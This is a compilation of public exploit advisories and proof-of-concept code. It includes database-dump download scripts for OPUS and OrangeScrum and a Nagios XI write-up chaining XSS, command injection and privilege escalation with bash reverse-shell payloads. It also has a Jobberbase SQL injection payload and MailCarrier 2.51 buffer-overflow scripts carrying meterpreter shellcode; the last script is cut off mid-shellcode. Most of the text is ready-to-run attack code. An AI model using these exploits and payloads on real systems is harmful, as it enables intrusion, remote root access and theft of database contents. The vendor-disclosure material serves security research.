in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible 

to the web server. As a workaround, you could restrict access to this file.

###########################################################################

File :
******
/sql_patch/data.sql

-- Add an admin user
INSERT INTO `user` (real_name, salutation, firstname, lastname, username, 
password, user_type, id) VALUES('OPUS Front Desk', 'OPUS', 'Front',
'Desk', 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'root', 1);
INSERT INTO `admin` (position, user_id) values('administrator', 1);

raw.githubusercontent.com/profcturner/opus/master/sql_patch/data.sql

/sql_patch/patch_3.3.x_4.0.0.sql

raw.githubusercontent.com/profcturner/opus/master/sql_patch/patch_3.3.x_4.0.0.sql

/sql_patch/patch_4.0.2_4.1.0.sql

raw.githubusercontent.com/profcturner/opus/master/sql_patch/patch_4.0.2_4.1.0.sql

/sql_patch/patch_4.1.0_4.1.1.sql

raw.githubusercontent.com/profcturner/opus/master/sql_patch/patch_4.1.0_4.1.1.sql

/sql_patch/patch_4.1.1_4.2.0.sql

raw.githubusercontent.com/profcturner/opus/master/sql_patch/patch_4.1.1_4.2.0.sql

File :
*******
/sql_patch/schema.sql

Information :
*************
-- MySQL dump 10.11
--
-- Host: localhost    Database: opusproduction
-- ------------------------------------------------------
-- Server version  5.0.32-Debian_7etch5-log

raw.githubusercontent.com/profcturner/opus/master/sql_patch/schema.sql

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/sql_patch/schema.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('Opus Online Placement University System 4.2.0 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="sql_patch/schema.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/sql_patch/schema.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/sql_patch/schema.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################

###########################################################################

# Exploit Title : OrangeScrum Project Management Software 1.6.1 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/04/2019
# Vendor Homepage : orangescrum.com
# Software Download Link : orangescrum.org/free-download
github.com/Orangescrum/orangescrum/archive/master.zip
libraries.io/github/Orangescrum/orangescrum
github.com/Orangescrum/orangescrum/releases/tag/v1.6.1
# Software Information Link : orangescrum.com/project-management
github.com/Orangescrum/orangescrum
# Software Version : 1.6.1 and lower versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/

###########################################################################

# Information about Software :
****************************
OrangeScrum is a Flexible Project Management web application written in CakePHP.

###########################################################################

# Impact :
***********
* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* An information exposure is the intentional or unintentional disclosure of information 

to an actor that is not explicitly authorized to have access to that information.

* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of 

MySQL over the World Wide Web. It can be used to dump a database or a collection of 

databases for backup or transfer to another SQL server (not necessarily a MySQL server). 

The dump typically contains SQL statements to create the table, populate it, or both. 

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and 

should not be found on a production system.

* It looks like this file contains a database backup/dump. 

Acunetix inferred this filename from the domain name. A database backup contains a record of the

 table structure and/or the data from a database and is usually in the form of a list of SQL statements. 

A database backup is most often used for backing up a database so that its contents can be restored 

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible 

to the web server. As a workaround, you could restrict access to this file.

Requirements
***************
* Apache with `mod_rewrite`
  * Enable curl in php.ini
  * Change the 'post_max_size' and `upload_max_filesize` to 200Mb in php.ini
* PHP 5.3 or higher
* MySQL 4.1 or higher
  * If STRICT mode is On, turn it Off.
Installation
*************
* Extract the archive. Upload the extracted folder(orangescrum-master) to your working directory.
* Provide proper write permission to "app/Config", "app/tmp" and "app/webroot" folders and their sub-folders.
Ex. chmod -R 0777 app/Config, chmod -R 0777 app/tmp, chmod -R 0777 app/webroot
You can change the write permission of "app/Config" folder after installation procedure is completed.
* Create a new MySQL database named "orangescrum"(`utf8_unicode_ci` collation).
* Get the database.sql file from the root directory and import that to your database.
* Locate your `app` directory, do the changes on following files:
  * `app/Config/database.php` - We have already updated the database name as 
"Orangescrum" which you can change at any point. In order to change it, just create a 
database using any name and update that name as database in DATABASE_CONFIG section. 
And also you can set a password for your Mysql login which you will have to update in the 
same page as password. [Required]
  * `app/Config/constants.php` - Provide your valid SMTP_UNAME and SMTP_PWORD. 
For SMTP email sending you can use(Only one at a time) either Gmail or Sendgrid or Mandrill. 
By default we are assuming that you are using Gmail, so Gmail SMTP configuration section is 
uncommented. If you are using Sendgrid or Mandrill just comment out the Gmail section and 
uncomment the Sendgrid or Mandrill configuration section as per your requirement. [Required]
  * `app/Config/constants.php` - Update the FROM_EMAIL_NOTIFY and SUPPORT_EMAIL [Required]
* Run the application as http://your-site.com/ from your browser and start using Orangescrum

For more information please visit below link:
orangescrum.org/general-installation-guide

###########################################################################

File :
******
/database.sql

Information :
*************
-- phpMyAdmin SQL Dump
-- version 4.1.12
-- phpmyadmin.net
--
-- Host: 127.0.0.1
-- Server version: 5.5.36
-- PHP Version: 5.4.27
-- Database : orangescrum

-- Database: `os_security`

-- Table structure for table `archives`

-- Table structure for table `case_actions`

-- Table structure for table `case_files`

-- Table structure for table `case_file_drives`

-- Table structure for table `case_filters`

-- Table structure for table `case_recents`

-- Table structure for table `case_settings`

-- Table structure for table `case_templates`

-- Table structure for table `case_user_emails`

-- Table structure for table `case_user_views`

-- Table structure for table `companies`

-- Table structure for table `company_users`

-- Table structure for table `custom_filters`

-- Table structure for table `dailyupdate_notifications`

-- Table structure for table `daily_updates`

-- Table structure for table `default_project_templates`

-- Table structure for table `default_project_template_cases`

-- Table structure for table `default_templates`

-- Dumping data for table `default_templates`

-- Table structure for table `easycases`

-- Table structure for table `easycase_milestones`

-- Table structure for table `email_reminders`

-- Table structure for table `log_activities`

-- Table structure for table `log_types`

-- Dumping data for table `log_types`

-- Table structure for table `mail_tbls`

-- Table structure for table `milestones`

-- Table structure for table `project_technologies`

-- Table structure for table `project_templates`

-- Table structure for table `project_template_cases`

-- Table structure for table `project_users`

-- Table structure for table `save_reports`

-- Table structure for table `subscriptions`

-- Dumping data for table `subscriptions`

-- Table structure for table `timezones`

-- Dumping data for table `timezones`

-- Table structure for table `timezone_names`

-- Dumping data for table `timezone_names`

-- Table structure for table `transactions`

-- Table structure for table `types`

-- Dumping data for table `types`

-- Table structure for table `type_companies`

-- Table structure for table `users`

-- Table structure for table `user_infos`

-- Table structure for table `user_invitations`

-- Table structure for table `user_logins`

-- Dumping data for table `user_logins`

-- Table structure for table `user_notifications`

-- Table structure for table `user_subscriptions`

-- Table structure for table `os_session_logs`

-- Table structure for table `addons`

-- Indexes for table `addons`

###########################################################################

# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/database.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit

###########################################################################

# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('OrangeScrum Project Management Software 1.0 Database Disclosure Exploit');
system('color a');


if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;

$File="database.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/database.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/database.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

###########################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###########################################################################

Nagios XI 5.5.10: XSS to #

Pubblicato dapolict 10 Aprile 2019  

Tl;dr

A remote attacker could trick an authenticated victim (with “autodiscovery job” creation privileges) to visit a malicious URL and obtain a remote root shell via a reflected Cross-Site Scripting (XSS), an authenticated Remote Code Execution (RCE) and a Local Privilege Escalation (LPE).



Introduction

A few months ago I read about some Nagios XI vulnerabilities which got me interested in studying it a bit by myself. For those of you who don’t know what Nagios XI is I suggest you have a look at their website.

Fortunately, around that same time the team I am part of in Shielder chose to start spending one week each month to research or 0day discovery projects. These vulnerabilities are part of the ones I have found during that week, you can read about all of them at the security disclosures page. My target was to find an unauthenticated remote code execution with zero interaction needed, which I couldn’t find in that time span, maybe I’ll have a second look sometime in the future 🙂


Disclaimers


    these vulnerabilities were found during [18-22]/02/2019, this blogpost is based on my notes and memory – if you find anything inaccurate leave a comment and I’ll correct it
    filepaths and line numbers reported here are related to version 5.5.10, they might have changed since then
    comments in the code reported here have been written by me
    I haven’t checked the patches for these vulnerabilities
    I haven’t investigated which release(s) introduced these vulnerabilities

Table of contents

0. first look at the source code
1. XSS to RCE
2. $ to #
3. one cl1ck one r00t
4. final notes
0. first look at the source code

Nagios offers quite a few options in order to try Nagios XI, with a 60 days trial which allows you to understand the architecture and try all the functionalities. During my test I used the OVA provided, however I suppose that’s a standard installation and the other options are the same.

By reading the code used on the web interface we can see a lot of files are not obfuscated and seemingly even commented. The first vulnerability I’ve found is a reflected XSS through an iframe tag creation, which is in nagiosxi/basedir/html/includes/pageparts.inc.php at line 552, function get_window_frame_url():


$xiwindow = grab_request_var("xiwindow", ""); // this reads the GET/POST parameters, the second arg is the fallback value
if ($xiwindow != "") {
    $rawurl = urldecode($xiwindow);
}
[...]
$a = parse_url($rawurl);
if (isset($a["host"])) {
    [...]
} else {
    $windowurl = $a["path"] . "?";
}
[...]
return encode_form_valq($windowurl);


Since parse_url() can be tricked into parsing a malicious URL via the xiwindow parameter, we can inject any URL in the resulting iframe src attribute:


$ php -r 'var_dump(parse_url("a:javascript:alert(1)//"));'
array(2) {
  ["scheme"]=>
  string(1) "a"
  ["path"]=>
  string(21) "javascript:alert(1)//"
}


PoC

http://nagiosxi.local/nagiosxi/about/index.php?xiwindow=a:javascript:alert(1)//


XSS to RCE

Now that we have the privileges of an authenticated user we can start looking at the authenticated pages. As the documentation suggests autodiscovery jobs allow a user to setup a scheduled scan of a specific subnet, along with many other options. That functionality resides in nagiosxi/basedir/html/includes/components/autodiscovery/autodiscovery.inc.php, at line 191 there’s an interesting function called autodiscovery_component_get_cmdline:


function autodiscovery_component_get_cmdline($jobid)
{
    [...]
    $system_dns = grab_array_var($jarr, "system_dns", "off"); // <- this comes from the user
    [...]
    if ($system_dns == "on") {
        $system_dns = "--system-dns=1";
    }
    [...]
    $cmd = "rm -f " . $xml_file . "; touch " . $watch_file . "; sudo /usr/bin/php " . $script_dir . "autodiscover_new.php --addresses=\"" . escapeshellcmd($address) . "\"  --exclude=\"" . escapeshellcmd($exclude_address) . "\" --output=" . $xml_file . " --watch=" . $watch_file . " --onlynew=0 --debug=1 " . $osd . "" . $topod . "" . $scan_delay . "" . $system_dns . "> " . $out_file . " 2>&1 & echo $!";

    return $cmd;
}

I know, this code looks super-vulnerable™, but if you analyze it most of the time the inputs are sanitized at different steps (many times using escapeshellcmd instead of escapeshellarg) and the exploitability level is lower than it seems.

As you can see the system_dns parameter ends up in the command line string which is going to be executed. The other variables which end in the string are sanitized, not under user-control or called differently than the user-supplied ones so this “trick” doesn’t work.

PoC

POST /nagiosxi/includes/components/autodiscovery/?mode=newjob HTTP/1.1
Host: nagiosxi.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 310
Connection: close
Cookie: nagiosxi=8rspko6npt4lkfqcvo9u5i70b2

update=1&job=-1&nsp=d333dca41f296fae9327eecdce86332176ed6bfc82c352e3276751ecedd6f172&address=192.168.1&exclude_address=&frequency=Once&hour=09&minute=00&ampm=AM&dayofweek=1&dayofmonth=1&os_detection=on&scandelay=&system_dns=%3bbash+-i+>%26+/dev/tcp/192.168.13.37/31337+0>%261%3b&topology_detection=&updateButton=

Now we have command execution as apache:nagios.

$ to #

It is possible to escalate our privileges to root by exploiting the script /usr/local/nagiosxi/scripts/repair_databases.sh which is runnable as root by our user without password, as sudo -l states.

Reading that script we find on line 12:

[...]
BASEDIR=$(dirname $(readlink -f $0)) # /usr/local/nagiosxi/scripts
[...]
eval $(php $BASEDIR/import_xiconfig.php) # wow, this looks dangerous
[...]


We do not have write privileges on that file, but let see what it does:

[...]
require_once("/usr/local/nagiosxi/html/config/config.inc.php");
[...]


For those of you not familiar with PHP, all require_once does is interpret the source code of another file during the interpretation of the current file. It is useful in modular and object-oriented projects.

Checking the permissions on such file confirms we do have read/write privileges:
$ ls -lah '/usr/local/nagiosxi/html/config/config.inc.php'
-rw-rw-r--. 1 nagios nagios 8.4K Feb 18 18:38 /usr/local/nagiosxi/html/config/config.inc.php 

We can poison it in order to inject arbitrary commands during the repair_databases.sh script execution and obtain root privileges.

PoC

$ echo 'print("bash -i >& /dev/tcp/192.168.13.37/31337 0>&1;");'>> '/usr/local/nagiosxi/html/config/config.inc.php'&& sudo /usr/local/nagiosxi/scripts/repair_databases.sh

One cl1ck one r00t

These vulnerabilities can be chained together in order to craft a malicious URL which when visited by a victim (authenticated in Nagios XI and with the ‘autodiscover job’ privileges) is going to trigger our vulnerabilities and provide us with a remote root shell.

PoC creation is left as exercise for the reader 🙂

Final notes

As I said earlier, by looking at the source code the security bugs seems to be patched on single vulnerabilities basis instead of implementing a safe way or guidelines to do common actions (such as executing CLI commands). However, that’s just a feeling I got by reading about the historical security bugs and the source code itself, the reality might be different.

Besides that, the communication with the developers was really smooth and they released a patch quickly.
Timeline

20/02:

—> 20/02 1st report sent
<— ACK

25/02:

—> 25/02 2nd report sent
<— ACK
    Released Nagios IM 2.2.7 with fixes for 2nd report

27/02: MITRE assigned CVEs

1st report:

    CVE-2019-9164 –> Remote code execution via new autodiscovery job
    CVE-2019-9165 –> SQL Injection via API and malicious user id
    CVE-2019-9166 –> Privilege escalation apache:nagios -> root
    CVE-2019-9167 –> XSS in iframe creation

2nd report:

    CVE-2019-9202 –> Remote code execution in Nagios IM
    CVE-2019-9203 –> Authorization bypass in Nagios IM
    CVE-2019-9204 –> SQL Injection in Nagios IM

28/02:

    Released Nagios XI 5.5.11 with fixes for 1st report

10/04:

    Public release

===========================================================================================
# Exploit Title: Jobberbase CMS - 'jobs-in' SQL Injection
# Dork: N/A
# Date: 30-03-2019
# Exploit Author: Suvadip Kar
# Vendor Homepage: http://jobberbase.com/
# Software Link: https://github.com/filipcte/jobberbase/zipball/master
# Version: v2.0
# Category: Webapps
# Tested on: Linux
# CVE: N/A
# Software Description: Jobberbase is an open-source job board platform that enables the creation of job sites.
===========================================================================================
#POC - SQLi
#Request: http://localhost/[PATH]/jobs/jobs-in/
#Vulnerable Parameter: jobs-in (GET)
#Payload: -4115" UNION ALL SELECT 33,user()-- XYZ

#EXAMPLE: http://localhost/[PATH]/jobs/jobs-in/-4115" UNION ALL SELECT 33,user()-- XYZ

===========================================================================================

#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 'RCPT TO' - Buffer Overflow (Remote)
# Date: 12/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
#0x7e4456f7 : jmp esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
#POC
#1.) Change ip and port in code
#2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
import sys
import socket
import time

#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
shellcode = ("\x89\xe0\xda\xdf\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x79\x6c\x6a\x48\x4d\x52\x57\x70\x45\x50\x65\x50\x55\x30\x6e"
"\x69\x6a\x45\x55\x61\x39\x50\x32\x44\x4e\x6b\x76\x30\x44\x70"
"\x4e\x6b\x42\x72\x76\x6c\x6c\x4b\x51\x42\x47\x64\x6e\x6b\x44"
"\x32\x44\x68\x56\x6f\x4c\x77\x43\x7a\x57\x56\x34\x71\x6b\x4f"
"\x6c\x6c\x37\x4c\x73\x51\x61\x6c\x75\x52\x74\x6c\x35\x70\x49"
"\x51\x68\x4f\x76\x6d\x56\x61\x6a\x67\x4a\x42\x7a\x52\x62\x72"
"\x53\x67\x4c\x4b\x72\x72\x54\x50\x4c\x4b\x63\x7a\x75\x6c\x4e"
"\x6b\x70\x4c\x72\x31\x73\x48\x4b\x53\x31\x58\x63\x31\x68\x51"
"\x43\x61\x6e\x6b\x72\x79\x77\x50\x46\x61\x5a\x73\x6e\x6b\x32"
"\x69\x64\x58\x6d\x33\x35\x6a\x32\x69\x4e\x6b\x67\x44\x4c\x4b"
"\x75\x51\x39\x46\x30\x31\x69\x6f\x4c\x6c\x4f\x31\x6a\x6f\x64"
"\x4d\x36\x61\x79\x57\x74\x78\x4d\x30\x32\x55\x7a\x56\x75\x53"
"\x73\x4d\x48\x78\x67\x4b\x61\x6d\x64\x64\x74\x35\x6b\x54\x72"
"\x78\x6e\x6b\x71\x48\x54\x64\x33\x31\x38\x53\x72\x46\x4c\x4b"
"\x44\x4c\x50\x4b\x6e\x6b\x71\x48\x55\x4c\x65\x51\x48\x53\x4e"
"\x6b\x54\x44\x4e\x6b\x76\x61\x5a\x70\x6f\x79\x57\x34\x76\x44"
"\x46\x44\x61\x4b\x31\x4b\x63\x51\x50\x59\x50\x5a\x32\x71\x79"
"\x6f\x59\x70\x51\x4f\x71\x4f\x70\x5a\x6e\x6b\x34\x52\x68\x6b"
"\x6c\x4d\x33\x6d\x53\x58\x74\x73\x44\x72\x67\x70\x53\x30\x52"
"\x48\x52\x57\x53\x43\x36\x52\x53\x6f\x61\x44\x50\x68\x72\x6c"
"\x31\x67\x55\x76\x64\x47\x6b\x4f\x78\x55\x68\x38\x6c\x50\x67"
"\x71\x63\x30\x45\x50\x64\x69\x4f\x34\x62\x74\x50\x50\x72\x48"
"\x54\x69\x4f\x70\x42\x4b\x67\x70\x49\x6f\x6e\x35\x50\x6a\x46"
"\x6b\x56\x39\x62\x70\x78\x62\x79\x6d\x42\x4a\x53\x31\x61\x7a"
"\x56\x62\x43\x58\x49\x7a\x64\x4f\x69\x4f\x59\x70\x4b\x4f\x79"
"\x45\x4f\x67\x73\x58\x56\x62\x57\x70\x67\x71\x4f\x4b\x4b\x39"
"\x4b\x56\x50\x6a\x56\x70\x66\x36\x63\x67\x62\x48\x4a\x62\x6b"
"\x6b\x67\x47\x55\x37\x6b\x4f\x5a\x75\x6f\x75\x49\x50\x33\x45"
"\x53\x68\x53\x67\x31\x78\x6f\x47\x6b\x59\x70\x38\x49\x6f\x59"
"\x6f\x38\x55\x66\x37\x33\x58\x61\x64\x68\x6c\x65\x6b\x38\x61"
"\x79\x6f\x4b\x65\x66\x37\x4e\x77\x52\x48\x73\x45\x62\x4e\x62"
"\x6d\x65\x31\x79\x6f\x7a\x75\x70\x6a\x55\x50\x73\x5a\x36\x64"
"\x71\x46\x56\x37\x72\x48\x56\x62\x38\x59\x4b\x78\x61\x4f\x69"
"\x6f\x69\x45\x4f\x73\x5a\x58\x63\x30\x51\x6e\x66\x4d\x4e\x6b"
"\x74\x76\x72\x4a\x47\x30\x51\x78\x57\x70\x76\x70\x63\x30\x65"
"\x50\x33\x66\x50\x6a\x37\x70\x30\x68\x31\x48\x49\x34\x51\x43"
"\x5a\x45\x49\x6f\x59\x45\x4e\x73\x76\x33\x70\x6a\x33\x30\x76"
"\x36\x52\x73\x53\x67\x52\x48\x66\x62\x6e\x39\x58\x48\x33\x6f"
"\x69\x6f\x4a\x75\x4d\x53\x7a\x58\x43\x30\x73\x4e\x73\x37\x47"
"\x71\x58\x43\x77\x59\x49\x56\x52\x55\x6d\x39\x5a\x63\x4f\x4b"
"\x68\x70\x6e\x55\x6e\x42\x63\x66\x33\x5a\x33\x30\x50\x53\x69"
"\x6f\x58\x55\x41\x41")

buffer = "A" * 5090 + "\xf7\x56\x44\x7e" + "\x90" * 20 + shellcode + "B" * 100

print "[*] Sending pwnage buffer: with %s bytes" %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 25))
print s.recv(1024)
s.send('EHLO root@telspace.co.za \r\n')
print s.recv(1024)
s.send('MAIL FROM: pwnz@telspace.co.za \r\n')
print s.recv(1024)
s.send('RCPT TO: '+ buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 - Remote Buffer Overflow in "USER" command(POP3)
# Date: 14/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
# POC
# 1.) Change ip and port in code
# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
# 0x1b023059 : push esp # ret 0x10 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
# Badchars \x00\xd9

import sys
import socket
import time

#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -b "\x00\xd9" -f c
shellcode = ("\x29\xc9\x83\xe9\xb2\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x44\x9b\x1b\x0b\x83\xee\xfc\xe2\xf4\xb8\x73\x99\x0b\x44\x9b"
"\x7b\x82\xa1\xaa\xdb\x6f\xcf\xcb\x2b\x80\x16\x97\x90\x59\x50"
"\x10\x69\x23\x4b\x2c\x51\x2d\x75\x64\xb7\x37\x25\xe7\x19\x27"
"\x64\x5a\xd4\x06\x45\x5c\xf9\xf9\x16\xcc\x90\x59\x54\x10\x51"
"\x37\xcf\xd7\x0a\x73\xa7\xd3\x1a\xda\x15\x10\x42\x2b\x45\x48"
"\x90\x42\x5c\x78\x21\x42\xcf\xaf\x90\x0a\x92\xaa\xe4\xa7\x85"
"\x54\x16\x0a\x83\xa3\xfb\x7e\xb2\x98\x66\xf3\x7f\xe6\x3f\x7e"
"\xa0\xc3\x90\x53\x60\x9a\xc8\x6d\xcf\x97\x50\x80\x1c\x87\x1a"
"\xd8\xcf\x9f\x90\x0a\x94\x12\x5f\x2f\x60\xc0\x40\x6a\x1d\xc1"
"\x4a\xf4\xa4\xc4\x44\x51\xcf\x89\xf0\x86\x19\xf3\x28\x39\x44"
"\x9b\x73\x7c\x37\xa9\x44\x5f\x2c\xd7\x6c\x2d\x43\x64\xce\xb3"
"\xd4\x9a\x1b\x0b\x6d\x5f\x4f\x5b\x2c\xb2\x9b\x60\x44\x64\xce"
"\x61\x4f\xc2\x4b\xe9\xb9\xf1\x1a\x61\x46\xf3\xf1\x04\x9b\x7b"
"\xe4\xde\xd3\xf3\x19\x0b\x45\x20\x92\xed\x2e\x8b\x4d\x5c\x2c"
"\x59\xc0\x3c\x23\x64\xce\x8e\x84\xee\x43\x5c\x2c\x2c\xf2\x33"
"\xbb\x64\xce\x5c\x2c\xef\xf7\x30\xa5\x64\xce\x5c\xd3\xf3\x6e"
"\x65\x09\xfa\xe4\xde\x2e\x9b\x71\x0f\x12\xcc\x73\x09\x9d\x53"
"\x44\xf4\x91\x18\xe3\x0b\x3a\xb6\x90\x3d\x2e\xdb\x73\x0b\x54"
"\x9b\x1b\x5d\x2e\x9b\x73\x53\xe0\xc8\xfe\xf4\x91\x08\x48\x61"
"\x44\xcd\x48\x5c\x2c\x99\xc2\xc3\x1b\x64\xce\x88\xbc\x9b\x65"
"\x0c\x45\x58\x32\xcd\x31\x72\xd8\xb0\xb4\x2e\xb9\x5d\x2e\x9b"
"\x48\xf4\x91\x9b\x1b\x0b")

buffer = "A" * 5094 + "\x59\x30\x02\x1b" + "\x90" * 20 + shellcode + "C" * (882-len(shellcode))

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

#!/usr/bin/python
# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "LIST" command(POP3)
# Date: 14/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Software Link: N.A
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP Prof SP3 ENG x86
# CVE: TBC from Mitre
# Created for the Telspace Internship 2019 - SEH Exploit
# POC
# 1.) Change ip, username, password and port in code
# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
#nseh 6178 seh 6182
import sys
import socket
import time

#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
